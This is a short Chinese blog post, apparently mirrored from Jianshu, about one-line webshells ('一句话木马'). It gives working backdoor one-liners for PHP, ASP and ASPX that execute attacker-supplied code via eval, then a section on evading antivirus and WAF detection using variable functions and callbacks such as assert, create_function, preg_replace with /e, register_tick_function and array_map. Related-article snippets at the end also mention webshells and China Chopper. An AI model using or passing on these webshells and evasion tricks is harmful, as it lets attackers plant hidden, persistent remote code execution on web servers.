美文网首页
一句话木马

一句话木马

作者: Franchen | 来源:发表于2019-03-11 17:23 被阅读0次

大马小马的区别

小马功能简单,一般只有文件浏览和上传的功能,但体积小,易隐藏。
大马功能强大,可以进行提权、连接数据库、反弹Shell等,但体积较大,容易被查杀。

简单的一句话木马

php: <?php @eval($_POST['pass']); ?>
asp: <% eval request('pass') %> 或 <% execute(request('pass')) %>
aspx: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
jsp 和 jspx 见:'https://www.jianshu.com/p/19facabb5f29'

如何绕过查杀

  • 可变函数
<?php $_REQUEST['func']($_REQUEST['pass']); ?>
/**
 * 可变函数不能用于语言结构,如echo(),print(),unset(),isset(),empty(),include(),require()等。
 * 参数func可以是:
 * assert  5、6可用,7无效
 * create_function("", $_REQUEST['pass'])
 * preg_replace("/.*/e", $_REQUEST['pass'], ".") // 7不可用
 * preg_replace_callback("/.*/", function ($a){@eval($a[0]);}, $_REQUEST['pass']) // 7新函数
 */
<?php
$s = "ss.ss.$_GET['func']";
$c = explode(".",$s);
register_tick_function($c[2], $_REQUEST['pass']);
declare(ticks = 2);
?>

/**
 * 回调函数可以是:
 * call_user_func|call_user_func_array('assert', array($_REQUEST['pass']));
 * array_map|array_filter(array($_REQUEST['pass']), $_REQUEST['func']); // func可以是assert
 */

相关文章

  • 一句话木马

    asp一句话木马是<%execute(request("value"))%> aspx的一句话木马是<%@ Pag...

  • 安全检测关键技术之Web木马检测和绕过

    Web木马一般是为了获得对网站的持久控制而留下的脚本。分为一句话木马和大马。一句话木马指的是并没有完整的网站控制功...

  • PHP一句话木马之小马

    什么是一句话木马 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测...

  • PHP之一句话木马

    一句话木马 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句...

  • 一句话木马

    一句话木马 asp php aspx 一句话木马变形 jsp脚本后门 先把下面的代码保存为 one.jsp (该代...

  • webshell

    打开题目显示 看到一句话木马,而且题目描述提示一句话木马放在index.php中。用菜刀连接。 连接后看到flag...

  • 网络安全实验报告 第四章

    中国菜刀配合一句话木马基本使用 菜刀的主要功能是用来连接一句话木马的,asp、aspx、php的一句话菜刀都可以连...

  • 2019-02-24 文件包含、文件上传和一句话木马配合使用

    刚刚写完的文件包含和文件上传学习,我还好奇如何使用文件上传,没想到一句话木马解决了我的疑问。 正常的一句话木马是就...

  • 一句话木马

    1.PHP一句话:

  • 一句话木马

    经典一句话 其他变种 使用var_dump(),打印出来关键信息: 最终一句话木马为: continue...

网友评论

      本文标题:一句话木马

      本文链接:https://www.haomeiwen.com/subject/cluepqtx.html